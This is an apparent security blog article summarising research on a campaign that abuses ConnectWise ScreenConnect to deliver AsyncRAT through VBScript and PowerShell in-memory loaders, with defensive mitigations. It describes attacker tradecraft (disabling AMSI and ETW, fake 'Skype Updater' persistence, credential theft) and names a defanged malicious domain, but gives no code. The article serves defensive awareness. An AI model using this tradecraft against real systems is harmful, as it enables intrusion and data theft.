## TL;DR
Cybercriminals are abusing ConnectWise ScreenConnect, a popular remote desktop tool, to deploy AsyncRAT via fileless malware techniques. Attackers use VBScript and PowerShell loaders to execute malicious payloads in-memory, evading detection, and achieve persistence through a fake Skype updater. This campaign highlights the growing threat of fileless malware and its ability to bypass traditional security measures.
## Introduction
Remote desktop tools like ConnectWise ScreenConnect are widely used by IT professionals and managed service providers (MSPs) for secure, real-time access to endpoints. However, cybercriminals have found a way to exploit this tool to deploy AsyncRAT, a dangerous remote access trojan (RAT). Researchers at LevelBlue have uncovered a campaign where attackers leverage scripted loaders and fileless malware techniques to steal data and maintain persistence on compromised systems.
How the Attack Unfolds
### 1. Initial Compromise via ScreenConnect
The attack begins with a compromised ScreenConnect client. Threat actors initiate an interactive session through a malicious domain (relay.shipperzone[.]online), which is linked to unauthorized ScreenConnect deployments. This domain serves as the entry point for the attack.
### 2. Execution of VBScript and PowerShell Loaders
Once the session is established, a VBScript triggers PowerShell commands to fetch two malicious payloads:
- logs.ldk
- logs.ldr
These payloads are downloaded from a remote server and stored in the C:\Users\Public\ directory. Instead of saving executables to disk, the attackers execute the payloads directly in memory, using a fileless malware technique that makes detection and defense significantly harder.
"The script converts the first-stage payload (logs.ldk) into a byte array and passes the second (logs.ldr) directly to theMain()method. This technique exemplifies fileless malware: no executable is written to disk, and all malicious logic is executed in-memory." — LevelBlue Research Report[^1]
### 3. In-Memory Execution and Anti-Analysis Tactics
The first in-memory stage of the AsyncRAT infection chain is Obfuscator.dll. This component:
- Launches the execution of the malware.
- Sets up persistence via a fake "Skype Updater".
- Disables defenses like AMSI (Antimalware Scan Interface) and ETW (Event Tracing for Windows).
The malware includes three core classes to handle:
- Initialization
- Dynamic payload loading
- Anti-analysis tactics
These features ensure stealth and prepare the system for the main payload.
### 4. Deployment of AsyncRAT
The core component of the attack is AsyncClient.exe, which serves as the C2 (Command and Control) engine. It performs the following actions:
- Decrypts configuration data using AES-256 encryption.
- Connects to C2 servers to receive commands.
- Parses commands via a custom protocol.
- Gathers system and security details.
- Monitors user activity with a keylogger.
- Exfiltrates sensitive data, including browser credentials and extensions.
Persistence is maintained through scheduled tasks, either via the CreateLoginTask() function in Obfuscator.dll or redundantly recreated from AsyncClient.
## Why Fileless Malware is a Growing Threat
Fileless malware continues to evade modern defenses due to its stealthy nature and reliance on legitimate system tools for execution. Unlike traditional malware, which writes executables to disk, fileless malware operates entirely in memory, making it:
- Harder to detect with traditional antivirus solutions.
- More challenging to analyze and eradicate.
- Highly effective at bypassing disk-based detection mechanisms.
"Fileless malware continues to evade modern defenses due to its stealthy nature and reliance on legitimate system tools for execution." — LevelBlue Research Report[^1]
## Mitigation and Defense Strategies
To defend against such attacks, organizations should:
1. Monitor for Unusual ScreenConnect Activity: Look for unauthorized sessions or connections to suspicious domains.
2. Implement Behavioral Detection: Use EDR (Endpoint Detection and Response) solutions to detect in-memory execution and unusual PowerShell activity.
3. Disable Unnecessary Scripting: Restrict the use of VBScript and PowerShell where possible.
4. Enable AMSI and ETW: Ensure these defenses are active and properly configured.
5. Educate Employees: Train staff to recognize phishing attempts and suspicious remote access requests.
## Conclusion
The exploitation of ConnectWise ScreenConnect to deploy AsyncRAT underscores the evolving tactics of cybercriminals. By leveraging fileless malware and scripted loaders, attackers can bypass traditional security measures, achieve persistence, and exfiltrate sensitive data. Organizations must adopt proactive defense strategies, including behavioral detection and employee training, to mitigate these advanced threats.
As fileless malware continues to evolve, staying ahead of such attacks will require continuous monitoring, advanced threat detection, and robust cybersecurity practices.
## Additional Resources
For further insights, check:
- LevelBlue Research Report on AsyncRAT Campaign
- ConnectWise ScreenConnect Official Documentation
## References
[^1]: LevelBlue (2025). "Attackers abuse ConnectWise ScreenConnect to drop AsyncRAT". Security Affairs. Retrieved 2025-09-11.